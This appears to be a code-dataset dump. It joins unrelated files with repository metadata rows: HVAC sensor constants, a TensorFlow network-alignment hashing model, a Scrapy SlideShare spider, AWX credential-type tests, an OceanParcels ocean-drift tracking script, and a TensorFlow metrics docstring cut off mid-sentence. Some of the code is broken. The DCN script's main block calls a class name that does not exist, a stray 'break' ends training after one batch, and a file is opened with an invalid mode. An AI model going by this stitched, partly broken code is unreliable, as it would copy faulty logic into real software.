CMD_SENSOR_TEMP_ON = b'\x03\x1d\x01\x04\x02'
CMD_SENSOR_HUMC_OFF = b'\x03\x1d\x01\x06\x00'
CMD_SENSOR_HUMC_AUTO = b'\x03\x1d\x01\x06\x01'
CMD_SENSOR_HUMC_ON = b'\x03\x1d\x01\x06\x02'
CMD_SENSOR_HUMP_OFF = b'\x03\x1d\x01\x07\x00'
CMD_SENSOR_HUMP_AUTO = b'\x03\x1d\x01\x07\x01'
CMD_SENSOR_HUMP_ON = b'\x03\x1d\x01\x07\x02'
CMD_READ_CONFIG = b'\x87\x15\x01'
CMD_READ_HRU = b'\x01\x01\x01\x10\x08'
CMD_BOOST_MODE_END = b'\x85\x15\x01\x06'
# Sensor locations
SENSOR_AWAY = 16
SENSOR_OPERATING_MODE_BIS = 49
SENSOR_OPERATING_MODE = 56
SENSOR_FAN_SPEED_MODE = 65
SENSOR_BYPASS_MODE = 66
SENSOR_PROFILE_TEMPERATURE = 67
SENSOR_FAN_MODE_SUPPLY = 70
SENSOR_FAN_MODE_EXHAUST = 71
SENSOR_FAN_TIME = 81
SENSOR_BYPASS_TIME = 82
SENSOR_SUPPLY_TIME = 86
SENSOR_EXHAUST_TIME = 87
SENSOR_FAN_EXHAUST_DUTY = 117
SENSOR_FAN_SUPPLY_DUTY = 118
SENSOR_FAN_SUPPLY_FLOW = 119
SENSOR_FAN_EXHAUS_FLOW = 120
SENSOR_FAN_EXHAUST_SPEED = 121
SENSOR_FAN_SUPPLY_SPEED = 122
SENSOR_POWER_CURRENT = 128
SENSOR_POWER_TOTAL_YEAR = 129
SENSOR_POWER_TOTAL = 130
SENSOR_PREHEATER_POWER_TOTAL_YEAR = 144
SENSOR_PREHEATER_POWER_TOTAL = 145
SENSOR_PREHEATER_POWER_CURRENT = 146
SENSOR_SETTING_RF_PAIRING = 176
SENSOR_DAYS_TO_REPLACE_FILTER = 192
SENSOR_CURRENT_RMOT = 209
SENSOR_HEATING_SEASON = 210
SENSOR_COOLING_SEASON = 211
SENSOR_TARGET_TEMPERATURE = 212
SENSOR_AVOIDED_HEATING_CURRENT = 213
SENSOR_AVOIDED_HEATING_TOTAL_YEAR = 214
SENSOR_AVOIDED_HEATING_TOTAL = 215
SENSOR_AVOIDED_COOLING_CURRENT = 216
SENSOR_AVOIDED_COOLING_YEAR = 217
SENSOR_AVOIDED_COOLING_TOTAL = 218
SENSOR_AVOIDED_COOLING_CURRENT_TARGET = 219
SENSOR_TEMPERATURE_SUPPLY = 221
SENSOR_COMFORTCONTROL_MODE = 225
SENSOR_BYPASS_STATE = 227
SENSOR_FROSTPROTECTION_UNBALANCE = 228
SENSOR_TEMPERATURE_EXTRACT = 274
SENSOR_TEMPERATURE_EXHAUST = 275
SENSOR_TEMPERATURE_OUTDOOR = 276
SENSOR_TEMPERATURE_AFTER_PREHEATER = 277
SENSOR_HUMIDITY_EXTRACT = 290
SENSOR_HUMIDITY_EXHAUST = 291
SENSOR_HUMIDITY_OUTDOOR = 292
SENSOR_HUMIDITY_AFTER_PREHEATER = 293
SENSOR_HUMIDITY_SUPPLY = 294
| 42.08046
| 108
| 0.696531
|
4a0f23f95b337eb31165efdf48d018b00ec43353
| 10,956
|
py
|
Python
|
src/lib_dcnh/dcn_neg_share_params.py
|
Allen517/dcnh
|
45eb1b6acd4353e082983772c3a357a01e9ff7f8
|
[
"BSD-4-Clause"
] | null | null | null |
src/lib_dcnh/dcn_neg_share_params.py
|
Allen517/dcnh
|
45eb1b6acd4353e082983772c3a357a01e9ff7f8
|
[
"BSD-4-Clause"
] | null | null | null |
src/lib_dcnh/dcn_neg_share_params.py
|
Allen517/dcnh
|
45eb1b6acd4353e082983772c3a357a01e9ff7f8
|
[
"BSD-4-Clause"
] | null | null | null |
# -*- coding:utf8 -*-
import random
import tensorflow as tf
import numpy as np
import os,sys
from utils.LogHandler import LogHandler
from utils.utils import load_train_valid_labels, batch_iter, valid_iter, read_embeddings
class DCN_SP(object):
def __init__(self, learning_rate, batch_size, neg_ratio, n_input, n_out, n_hidden, n_layer
, device, files, log_file):
if os.path.exists('log/'+log_file+'.log'):
os.remove('log/'+log_file+'.log')
self.logger = LogHandler(log_file)
self.device = device
# Parameters
self.learning_rate = learning_rate
self.batch_size = batch_size
self.neg_ratio = neg_ratio
self.valid_prop = .9
self.valid_sample_size = 9
self.gamma = 1
self.eta = 0
self.cur_epoch = 1
# Network Parameters
self.n_hidden = n_hidden # number of neurons in hidden layer
self.n_input = n_input # size of node embeddings
self.n_out = n_out # hashing code
self.n_layer = n_layer # number of layer
# Set Train Data
if not isinstance(files, list) and len(files)<3:
self.logger.info('The alogrihtm needs files like [First Graph File, Second Graph File, Label File]')
return
# tf Graph input
self.lookup_f = dict()
self.lookup_g = dict()
self.look_back_f = list()
self.look_back_g = list()
self._read_train_dat(files[0], files[1], files[2]) # douban, weibo, label files
self.valid_sample_size = min(min(self.valid_sample_size, len(self.look_back_f)-1), len(self.look_back_g)-1)
# TF Graph Building
self.sess = tf.Session()
cur_seed = random.getrandbits(32)
initializer = tf.contrib.layers.xavier_initializer(uniform=False, seed=cur_seed)
with tf.device(self.device):
with tf.variable_scope("model", reuse=None, initializer=initializer):
self.mlp_weights()
self.build_graph()
self.build_valid_graph()
self.sess.run(tf.global_variables_initializer())
def _read_train_dat(self, embed1_file, embed2_file, label_file):
self.L = load_train_valid_labels(label_file, self.valid_prop)
self.F, self.lookup_f, self.look_back_f = read_embeddings(embed1_file, self.lookup_f, self.look_back_f)
self.G, self.lookup_g, self.look_back_g = read_embeddings(embed2_file, self.lookup_g, self.look_back_g)
def mlp_weights(self):
# Store layers weight & bias
self.weights = dict()
self.biases = dict()
self.weights['h0_f'] = tf.Variable(tf.random_normal([self.n_input, self.n_hidden]))
self.weights['h0_g'] = tf.Variable(tf.random_normal([self.n_input, self.n_hidden]))
self.biases['b0_f'] = tf.Variable(tf.zeros([self.n_hidden]))
self.biases['b0_g'] = tf.Variable(tf.zeros([self.n_hidden]))
for i in range(1,self.n_layer):
self.weights['h{}'.format(i)] = tf.Variable(tf.random_normal([self.n_hidden, self.n_hidden]))
self.biases['b{}'.format(i)] = tf.Variable(tf.zeros([self.n_hidden]))
self.weights['out'] = tf.Variable(tf.random_normal([self.n_hidden, self.n_out]))
self.biases['b_out'] = tf.Variable(tf.zeros([self.n_out]))
def build_code_graph(self, inputs, tag):
# Input layer
layer = tf.nn.sigmoid(tf.add(tf.matmul(tf.reshape(inputs,[-1,self.n_input]), self.weights['h0_'+tag])
, self.biases['b0_'+tag]))
for i in range(1,self.n_layer):
layer = tf.nn.sigmoid(tf.add(tf.matmul(layer, self.weights['h{}'.format(i)])
, self.biases['b{}'.format(i)]))
# Output fully connected layer with a neuron
code = tf.nn.tanh(tf.matmul(layer, self.weights['out']) + self.biases['b_out'])
return code
def build_lin_code_graph(self, inputs, tag):
# Output fully connected layer with a neuron
code = tf.nn.tanh(tf.matmul(tf.reshape(inputs,[-1,self.n_input]), self.weights['out']) + self.biases['b_out'])
return code
def build_train_graph(self, src_tag, obj_tag):
PF = self.build_code_graph(self.pos_src_inputs, src_tag) # batch_size*n_out
PG = self.build_code_graph(self.pos_obj_inputs, obj_tag) # batch_size*n_out
NF = tf.reshape(
self.build_code_graph(self.neg_src_inputs, src_tag)
, [-1, self.neg_ratio, self.n_out]
) # batch_size*neg_ratio*n_out
NG = tf.reshape(
self.build_code_graph(self.neg_obj_inputs, obj_tag)
, [-1, self.neg_ratio, self.n_out]
) # batch_size*neg_ratio*n_out
# B = tf.sign(PF+PG) # batch_size*n_out
# self.ph['B'] = tf.sign(self.ph['F']+self.ph['G']) # batch_size*n_out
# train loss
term1_first = tf.log(tf.nn.sigmoid(tf.reduce_sum(.5*tf.multiply(PF, PG),axis=1)))
term1_second = tf.reduce_sum(tf.log(1-tf.nn.sigmoid(tf.reduce_sum(.5*tf.multiply(NF, NG),axis=2))),axis=1)
term1 = -tf.reduce_sum(term1_first+term1_second)
# term2 = tf.reduce_sum(tf.pow((B-PF),2))+tf.reduce_sum(tf.pow((B-PG),2))
term3 = tf.reduce_sum(tf.reduce_sum(tf.pow(PF,2))+tf.reduce_sum(tf.pow(PG,2), axis=1))
# term1 = -tf.reduce_sum(tf.multiply(self.ph['S'], theta)-tf.log(1+tf.exp(theta)))
# term2 = tf.reduce_sum(tf.norm(self.ph['B']-self.ph['F'],axis=1))+tf.reduce_sum(tf.norm(self.ph['B']-self.ph['G'],axis=1))
# term3 = tf.reduce_sum(tf.norm(self.ph['F'],axis=1))+tf.reduce_sum(tf.norm(self.ph['G'],axis=1))
return (term1+self.eta*term3)/self.cur_batch_size
def build_graph(self):
self.cur_batch_size = tf.placeholder('float32', name='batch_size')
self.pos_src_inputs = tf.placeholder('float32', [None, self.n_input])
self.pos_obj_inputs = tf.placeholder('float32', [None, self.n_input])
self.neg_src_inputs = tf.placeholder('float32', [None, self.neg_ratio, self.n_input])
self.neg_obj_inputs = tf.placeholder('float32', [None, self.neg_ratio, self.n_input])
self.loss_f2g = self.build_train_graph('f', 'g')
self.loss_g2f = self.build_train_graph('g', 'f')
# self.loss = (term1+self.eta*term3)/self.cur_batch_size
optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.train_op_f2g = optimizer.minimize(self.loss_f2g)
self.train_op_g2f = optimizer.minimize(self.loss_g2f)
def build_valid_graph(self):
# validation
self.valid_f_inputs = tf.placeholder('float32', [None, self.valid_sample_size, self.n_input])
self.valid_g_inputs = tf.placeholder('float32', [None, self.valid_sample_size, self.n_input])
valid_f = tf.reshape(
self.build_code_graph(self.valid_f_inputs, 'f')
, [-1, self.valid_sample_size, self.n_out]
) # batch_size*neg_ratio*n_out
valid_g = tf.reshape(
self.build_code_graph(self.valid_g_inputs, 'g')
, [-1, self.valid_sample_size, self.n_out]
) # batch_size*neg_ratio*n_out
self.dot_dist = tf.reduce_sum(tf.multiply(valid_f, valid_g),axis=2)
# self.hamming_dist = -tf.reduce_sum(
# tf.clip_by_value(tf.sign(tf.multiply(valid_f,valid_g)),-1.,0.)
# , axis=2
# )
def train_one_epoch(self):
sum_loss = 0.0
# train process
batches_f2g = list(batch_iter(self.L, self.batch_size, self.neg_ratio\
, self.lookup_f, self.lookup_g, 'f', 'g'))
batches_g2f = list(batch_iter(self.L, self.batch_size, self.neg_ratio\
, self.lookup_g, self.lookup_f, 'g', 'f'))
n_batches = min(len(batches_f2g), len(batches_g2f))
batch_id = 0
for i in range(n_batches):
# training the process from network f to network g
pos_src_f2g,pos_obj_f2g,neg_src_f2g,neg_obj_f2g = batches_f2g[i]
if not len(pos_src_f2g)==len(pos_obj_f2g) and not len(neg_src_f2g)==len(neg_obj_f2g):
self.logger.info('The input label file goes wrong as the file format.')
continue
batch_size_f2g = len(pos_src_f2g)
feed_dict = {
self.pos_src_inputs:self.F[pos_src_f2g,:],
self.pos_obj_inputs:self.G[pos_obj_f2g,:],
self.neg_src_inputs:self.F[neg_src_f2g,:],
self.neg_obj_inputs:self.G[neg_obj_f2g,:],
self.cur_batch_size:batch_size_f2g
}
_, cur_loss_f2g = self.sess.run([self.train_op_f2g, self.loss_f2g],feed_dict)
sum_loss += cur_loss_f2g
# training the process from network g to network f
pos_src_g2f,pos_obj_g2f,neg_src_g2f,neg_obj_g2f = batches_g2f[i]
if not len(pos_src_g2f)==len(pos_obj_g2f) and not len(neg_src_g2f)==len(neg_obj_g2f):
self.logger.info('The input label file goes wrong as the file format.')
continue
batch_size_g2f = len(pos_src_g2f)
feed_dict = {
self.pos_src_inputs:self.G[pos_src_g2f,:],
self.pos_obj_inputs:self.F[pos_obj_g2f,:],
self.neg_src_inputs:self.G[neg_src_g2f,:],
self.neg_obj_inputs:self.F[neg_obj_g2f,:],
self.cur_batch_size:batch_size_g2f
}
_, cur_loss_g2f = self.sess.run([self.train_op_g2f, self.loss_g2f],feed_dict)
sum_loss += cur_loss_g2f
batch_id += 1
break
# valid process
valid_f, valid_g = valid_iter(self.L, self.valid_sample_size, self.lookup_f, self.lookup_g, 'f', 'g')
# print valid_f,valid_g
if not len(valid_f)==len(valid_g):
self.logger.info('The input label file goes wrong as the file format.')
return
valid_size = len(valid_f)
feed_dict = {
self.valid_f_inputs:self.F[valid_f,:],
self.valid_g_inputs:self.G[valid_g,:],
}
valid_dist = self.sess.run(self.dot_dist,feed_dict)
# valid_dist = self.sess.run(self.hamming_dist,feed_dict)
mrr = .0
for i in range(valid_size):
fst_dist = valid_dist[i][0]
pos = 1
for k in range(1,len(valid_dist[i])):
if fst_dist<=valid_dist[i][k]:
pos+=1
# print pos
# self.logger.info('dist:{},pos:{}'.format(fst_dist,pos))
# print valid_dist[i]
mrr += 1./pos
self.logger.info('Epoch={}, sum of loss={!s}, mrr={}'
.format(self.cur_epoch, sum_loss/batch_id/2, mrr/valid_size))
# print 'mrr:',mrr/valid_size
# self.logger.info('Epoch={}, sum of loss={!s}, valid_loss={}'
# .format(self.cur_epoch, sum_loss/batch_id, valid_loss))
self.cur_epoch += 1
def _write_in_file(self, filename, vec, tag):
with open(filename, 'aw') as res_handler:
if len(vec.shape)>1:
column_size = vec.shape[1]
else:
column_size = 1
reshape_vec = vec.reshape(-1)
vec_size = len(reshape_vec)
res_handler.write(tag+'\n')
for i in range(0,vec_size,column_size):
res_handler.write('{}\n'.format(' '.join([str(reshape_vec[i+k]) for k in range(column_size)])))
def save_models(self, filename):
if os.path.exists(filename):
os.remove(filename)
for k,v in self.weights.iteritems():
self._write_in_file(filename, v.eval(self.sess), k)
for k,v in self.biases.iteritems():
self._write_in_file(filename, v.eval(self.sess), k)
if __name__ == '__main__':
res_file = 'res_file'
# SAVING_STEP = 1
# MAF_EPOCHS = 21
# model = DCNH(learning_rate=0.1, batch_size=4, neg_ratio=3, n_input=4, n_out=2, n_hidden=3
# ,files=['tmp_res.node_embeddings_src', 'tmp_res.node_embeddings_obj', 'data/test.align'])
SAVING_STEP = 10
MAF_EPOCHS = 20001
model = DCNH_SP(learning_rate=0.01, batch_size=128, neg_ratio=5, n_input=256, n_out=32, n_hidden=32, n_layer=2
,files=['douban_all.txt', 'weibo_all.txt', 'douban_weibo.identity.users.final.p0dot8']
,log_file='DCNH_SP'
,device=':/gpu:0')
for i in range(MAF_EPOCHS):
model.train_one_epoch()
if i>0 and i%SAVING_STEP==0:
model.save_models(res_file+'.epoch_'+str(i))
| 39.268817
| 125
| 0.704728
|
4a0f2575441d7b78c283d2ee592c1a37766b8c9f
| 3,261
|
py
|
Python
|
slideshare/spiders/arasaac.py
|
lmorillas/recursoscaa
|
bac2ff39d67028ca8d4969d23f5061f09be59a0e
|
[
"Apache-2.0"
] | null | null | null |
slideshare/spiders/arasaac.py
|
lmorillas/recursoscaa
|
bac2ff39d67028ca8d4969d23f5061f09be59a0e
|
[
"Apache-2.0"
] | null | null | null |
slideshare/spiders/arasaac.py
|
lmorillas/recursoscaa
|
bac2ff39d67028ca8d4969d23f5061f09be59a0e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import scrapy
from urlparse import urljoin, urlparse
from slideshare.items import SlideshareItem
import json
BASE = 'http://es.slideshare.net/'
historico = json.load(open('historico.json'))
urls = [h.get('url') for h in historico]
class ArasaacSpider(scrapy.Spider):
name = "arasaac"
allowed_domains = ["slideshare.net"]
_urlbase = "http://es.slideshare.net/search/slideshow?ft=all&lang=**&page={}&q=arasaac&qid=c379a98f-bffa-47f9-8c4e-0bfc6c9efb7d&searchfrom=header&sort=&ud=month"
#_urlbase2 = 'http://es.slideshare.net/search/slideshow?lang=es&page={}&q=arasaac&sort=relevance'
#_urlbase = 'http://es.slideshare.net/search/slideshow?ft=all&lang=%2A%2A&page={}&q=arasaac&qid=4941c245-759a-431d-9672-a730e03eb500&searchfrom=header&sort=&ud=year'
start_urls = [
'http://es.slideshare.net/search/slideshow?searchfrom=header&q=arasaac',
]
start_urls.extend([_urlbase.format(x) for x in range(1, 10)])
#start_urls.extend([_urlbase2.format(x) for x in range(1, 300)])
parsed = []
def extract(self, dato, path):
x = self.sel.xpath(path)
if x:
self.item[dato] = x[0].extract().strip()
def parse(self, response):
if urlparse(response.url).path in urls:
return
if 'slideshare.net/search/' in response.url:
siguientes = response.selector.xpath(u'//a[contains(@class, "iso_slideshow_link")]/@href').extract()
for s in siguientes:
path = urlparse(s).path
if path not in self.parsed and path not in urls:
self.parsed.append(path)
yield scrapy.Request(urljoin(BASE, path))
else:
self.sel = response.selector
self.item = SlideshareItem()
path = urlparse(response.url).path
# item['url'] = path
self.item['url'] = path
self.extract('autor', '//a[@class="j-author-name"]/text()')
self.extract('label', '//h1[@itemprop="headline"]/text()')
# self.extract('fecha', '//time[@itemprop="datePublished"]/text()')
self.extract('fecha', '//time[@datetime]/@datetime')
if self.item['fecha']:
self.item['fecha'] = self.item['fecha'][:10]
self.extract('desc', '//p[contains(@class, "j-desc-expand")]/text()')
if not self.item.get('desc'):
self.extract('desc', '//div[contains(@class, "j-desc-more")]/text()')
src_imagen = self.sel.xpath('//img[contains(@class, "slide_image")]/@src')
if src_imagen:
self.item['imagen'] = urlparse(src_imagen[0].extract()).path
else:
self.extract('imagen', '//meta[@itemprop="thumbnailUrl"]/@content')
self.extract('lang', '//meta[@itemprop="inLanguage"]/@content')
if self.item['lang'] == '' or '*' in self.item['lang'] \
or '!!' in self.item['lang']:
self.item['lang'] = 'es'
self.extract('plays', '//meta[@name="slideshow_view_count"]/@content')
if self.item.get('plays'):
self.item['plays'] = int(self.item['plays'])
yield self.item
| 41.807692
| 169
| 0.579577
|
4a0f25aa30af5f56aabcff2ccb280fadb885d36f
| 2,031
|
py
|
Python
|
awx_collection/test/awx/test_credential_type.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 11,396
|
2017-09-07T04:56:02.000Z
|
2022-03-31T13:56:17.000Z
|
awx_collection/test/awx/test_credential_type.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 11,046
|
2017-09-07T09:30:46.000Z
|
2022-03-31T20:28:01.000Z
|
awx_collection/test/awx/test_credential_type.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 3,592
|
2017-09-07T04:14:31.000Z
|
2022-03-31T23:53:09.000Z
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import pytest
from awx.main.models import CredentialType
@pytest.mark.django_db
def test_create_custom_credential_type(run_module, admin_user, silence_deprecation):
# Example from docs
result = run_module(
'credential_type',
dict(
name='Nexus',
description='Credentials type for Nexus',
kind='cloud',
inputs={"fields": [{"id": "server", "type": "string", "default": "", "label": ""}], "required": []},
injectors={'extra_vars': {'nexus_credential': 'test'}},
state='present',
),
admin_user,
)
assert not result.get('failed', False), result.get('msg', result)
assert result.get('changed'), result
ct = CredentialType.objects.get(name='Nexus')
assert result['name'] == 'Nexus'
assert result['id'] == ct.pk
assert ct.inputs == {"fields": [{"id": "server", "type": "string", "default": "", "label": ""}], "required": []}
assert ct.injectors == {'extra_vars': {'nexus_credential': 'test'}}
@pytest.mark.django_db
def test_changed_false_with_api_changes(run_module, admin_user):
result = run_module(
'credential_type',
dict(
name='foo',
kind='cloud',
inputs={"fields": [{"id": "env_value", "label": "foo", "default": "foo"}]},
injectors={'env': {'TEST_ENV_VAR': '{{ env_value }}'}},
),
admin_user,
)
assert not result.get('failed', False), result.get('msg', result)
assert result.get('changed'), result
result = run_module(
'credential_type',
dict(
name='foo',
inputs={"fields": [{"id": "env_value", "label": "foo", "default": "foo"}]},
injectors={'env': {'TEST_ENV_VAR': '{{ env_value }}'}},
),
admin_user,
)
assert not result.get('failed', False), result.get('msg', result)
assert not result.get('changed'), result
| 32.238095
| 116
| 0.579025
|
4a0f26276caebec326dfb89fccd3026a49facde8
| 6,925
|
py
|
Python
|
North Atlantic/Particle Tracking/NorthAtlanticStokeTotalTracking.py
|
OceanParcels/SKIM-garbagepatchlocations
|
3c028e3ceba902ff79f52e31b83bed811bde1133
|
[
"MIT"
] | 1
|
2021-07-13T12:55:20.000Z
|
2021-07-13T12:55:20.000Z
|
North Atlantic/Particle Tracking/NorthAtlanticStokeTotalTracking.py
|
OceanParcels/SKIM-garbagepatchlocations
|
3c028e3ceba902ff79f52e31b83bed811bde1133
|
[
"MIT"
] | null | null | null |
North Atlantic/Particle Tracking/NorthAtlanticStokeTotalTracking.py
|
OceanParcels/SKIM-garbagepatchlocations
|
3c028e3ceba902ff79f52e31b83bed811bde1133
|
[
"MIT"
] | 1
|
2022-02-28T14:03:13.000Z
|
2022-02-28T14:03:13.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 14 14:43:49 2018
@author: Victor Onink
"""
from parcels import FieldSet, ParticleSet, JITParticle, AdvectionRK4,ErrorCode, plotTrajectoriesFile,Variable,Geographic,GeographicPolar
from datetime import timedelta, datetime
import numpy as np
from operator import attrgetter
import math
#We can add or remove all the zeros according to preference. In case that they are left there, we only get daily data for the currents which will end up with the code running faster, but we do lose time resolution. Tests will determine if this loss in time resolution is actually important
filenames = {'U': "/scratch/Victor/TotalData/20*.nc",
'V': "/scratch/Victor/TotalData/20*.nc",
'uuss':"/scratch/Victor/StokeData/Stoke*.nc",
'vuss':"/scratch/Victor/StokeData/Stoke*.nc",
'borU':"/scratch/Victor/AvgTotCur/boundary_velocitiesT*",
'borV':"/scratch/Victor/AvgTotCur/boundary_velocitiesT*"}
variables = {'U': 'eastward_eulerian_current_velocity',
'V': 'northward_eulerian_current_velocity',
'uuss':'uuss',
'vuss':'vuss',
'borU':'MaskUvel',
'borV':'MaskVvel'}
dimensions = {'U':{'time':'time','lat':'lat','lon':'lon'},
'V':{'time':'time','lat':'lat','lon':'lon'},
'uuss':{'time':'time','lat':'latitude','lon':'longitude'},
'vuss':{'time':'time','lat':'latitude','lon':'longitude'},
'borU':{'time':'time','lat':'lat','lon':'lon'},
'borV': {'time':'time','lat':'lat','lon':'lon'},
}
#%%
#Create the fieldset with the periodic halo and time extrapolation for the EKE
print 'Creating the fieldset'
fieldset = FieldSet.from_netcdf(filenames, variables, dimensions,allow_time_extrapolation=True)
fieldset.add_periodic_halo(zonal=True)
fieldset.uuss.units=GeographicPolar()
fieldset.vuss.units=Geographic()
#The starting coordinates of the Particles, for the North Pacific. They are generated
#by the code NAgrid.py, graciously send to me by David.
lons=np.load('/home/students/4056094/Desktop/Thesis/ParcelsOutput/North Atlantic/InputDistribution/LonsTestgrid0_5.npy')
lats=np.load('/home/students/4056094/Desktop/Thesis/ParcelsOutput/North Atlantic/InputDistribution/LatsTestgrid0_5.npy')
#lons, lats = np.meshgrid(lon,lat)
lons[lons<0]+=360
#And now we define what sort of particles we are actually dealing with
class SampleParticle(JITParticle):
# #Now the part to determine the age of the particle
Age=Variable('Age',initial=0.,dtype=np.float32)#agr is gonna be in seconds
prev_time=Variable('prev_time',initial=attrgetter('time'),to_write=False)
#Now the part to track the distance covered
# distance = Variable('distance', initial=0., dtype=np.float32)
# prev_lon = Variable('prev_lon', dtype=np.float32, to_write=False,
# initial=attrgetter('lon'))
# prev_lat = Variable('prev_lat', dtype=np.float32, to_write=False,
# initial=attrgetter('lat'))
# #Now I also want the particle to be deleted if it is on land (so it won't move)
# count=Variable('count',initial=0,to_write=False)
# init_lon = Variable('init_lon', dtype=np.float32, to_write=False,
# initial=attrgetter('lon'))
# init_lat = Variable('init_lat', dtype=np.float32, to_write=False,
# initial=attrgetter('lat'))
#The starting point of the similation and the endtime
print 'Creating the pset'
starttime=datetime(2002,1,1,0,0)
endtime=datetime(2014,12,31,21,0)
pset = ParticleSet(fieldset=fieldset, pclass=SampleParticle, lon=lons, lat=lats,time=starttime)
#%% All the different functions/kernels we want to have
def DeleteParticle(particle, fieldset, time, dt):
particle.delete()
print 'we deleted it at '+str(particle.lon)+' and '+str(particle.lat)
def AgeSample(particle, fiedset,time,dt):
current_time=particle.time
timedifference=current_time-particle.prev_time
particle.Age+=timedifference
particle.prev_time=current_time
#def TotalDistance(particle, fieldset, time, dt):
# Calculate the distance in latitudinal direction (using 1.11e2 kilometer per degree latitude)
# lat_dist = (particle.lat - particle.prev_lat) * 1.11e2
# Calculate the distance in longitudinal direction, using cosine(latitude) - spherical earth
# lon_dist = (particle.lon - particle.prev_lon) * 1.11e2 * math.cos(particle.lat * math.pi / 180)
# Calculate the total Euclidean distance travelled by the particle
# particle.distance += math.sqrt(math.pow(lon_dist, 2) + math.pow(lat_dist, 2))
# particle.prev_lon = particle.lon # Set the stored values for next iteration.
# particle.prev_lat = particle.lat
def periodicBC(particle,fieldset,time,dt):
if particle.lon<0:
particle.lon+=360
elif particle.lon >360:
particle.lon-=360
def RungeKutta4FullCurrents(particle,fieldset,time,dt):
lon0,lat0=particle.lon,particle.lat
constant=0.00001*(-1)
d=particle.depth
u0=constant*fieldset.borU[time,lon0,lat0,d]+fieldset.U[time,lon0,lat0,d]+fieldset.uuss[time,lon0,lat0,d]
v0=constant*fieldset.borV[time,lon0,lat0,d]+fieldset.V[time,lon0,lat0,d]+fieldset.vuss[time,lon0,lat0,d]
lon1=lon0+u0*dt/2
lat1=lat0+v0*dt/2
u1=constant*fieldset.borU[time+0.5*dt,lon1,lat1,d]+fieldset.U[time+0.5*dt,lon1,lat1,d]+fieldset.uuss[time+0.5*dt,lon1,lat1,d]
v1=constant*fieldset.borV[time+0.5*dt,lon1,lat1,d]+fieldset.V[time+0.5*dt,lon1,lat1,d]+fieldset.vuss[time+0.5*dt,lon1,lat1,d]
lon2=lon0+u1*dt/2
lat2=lat0+v1*dt/2
u2=constant*fieldset.borU[time+0.5*dt,lon2,lat2,d]+fieldset.U[time+0.5*dt,lon2,lat2,d]+fieldset.uuss[time+0.5*dt,lon2,lat2,d]
v2=constant*fieldset.borV[time+0.5*dt,lon2,lat2,d]+fieldset.V[time+0.5*dt,lon2,lat2,d]+fieldset.vuss[time+0.5*dt,lon2,lat2,d]
lon3=lon0+u2*dt
lat3=lat0+v2*dt
u3=constant*fieldset.borU[time+dt,lon3,lat3,d]+fieldset.U[time+dt,lon3,lat3,d]+fieldset.uuss[time+dt,lon3,lat3,d]
v3=constant*fieldset.borV[time+dt,lon3,lat3,d]+fieldset.V[time+dt,lon3,lat3,d]+fieldset.vuss[time+dt,lon3,lat3,d]
particle.lon+=(u0+2*u1+2*u2+u3)/6. * dt
particle.lat+=(v0+2*v1+2*v2+v3)/6. *dt
move=pset.Kernel(periodicBC)
Advection=pset.Kernel(RungeKutta4FullCurrents)
Agesam=pset.Kernel(AgeSample)
#Distsam=pset.Kernel(TotalDistance)
totalKernal=Advection+move+Agesam
#%%
pfile = pset.ParticleFile(name="/scratch/Victor/AtlanticStokeTotal3h",
outputdt=timedelta(hours=48))
Time=starttime
steps=0
while Time<=endtime:
steps+=1
Time+=timedelta(hours=48)
print 'now we start advecting them for how many steps? '+str(steps)
pset.execute(totalKernal,
runtime=timedelta(hours=48*(steps-1)), # runtime controls the interval of the plots
dt=timedelta(minutes=30),
recovery={ErrorCode.ErrorOutOfBounds: DeleteParticle},
output_file=pfile
) # the recovery kernel
#%%
| 49.113475
| 289
| 0.707004
|
4a0f2677afe2715ce479e1870bf3a0624ff73bdb
| 7,557
|
py
|
Python
|
tensorflow/contrib/metrics/__init__.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | 6
|
2016-09-07T18:38:41.000Z
|
2020-01-12T23:01:03.000Z
|
tensorflow/contrib/metrics/__init__.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/metrics/__init__.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | 8
|
2017-06-08T09:46:06.000Z
|
2021-06-20T14:03:19.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""##Ops for evaluation metrics and summary statistics.
### API
This module provides functions for computing streaming metrics: metrics computed
on dynamically valued `Tensors`. Each metric declaration returns a
"value_tensor", an idempotent operation that returns the current value of the
metric, and an "update_op", an operation that accumulates the information
from the current value of the `Tensors` being measured as well as returns the
value of the "value_tensor".
To use any of these metrics, one need only declare the metric, call `update_op`
repeatedly to accumulate data over the desired number of `Tensor` values (often
each one is a single batch) and finally evaluate the value_tensor. For example,
to use the `streaming_mean`:
```python
value = ...
mean_value, update_op = tf.contrib.metrics.streaming_mean(values)
sess.run(tf.initialize_local_variables())
for i in range(number_of_batches):
print('Mean after batch %d: %f' % (i, update_op.eval())
print('Final Mean: %f' % mean_value.eval())
```
Each metric function adds nodes to the graph that hold the state necessary to
compute the value of the metric as well as a set of operations that actually
perform the computation. Every metric evaluation is composed of three steps
* Initialization: initializing the metric state.
* Aggregation: updating the values of the metric state.
* Finalization: computing the final metric value.
In the above example, calling streaming_mean creates a pair of state variables
that will contain (1) the running sum and (2) the count of the number of samples
in the sum. Because the streaming metrics use local variables,
the Initialization stage is performed by running the op returned
by `tf.initialize_local_variables()`. It sets the sum and count variables to
zero.
Next, Aggregation is performed by examining the current state of `values`
and incrementing the state variables appropriately. This step is executed by
running the `update_op` returned by the metric.
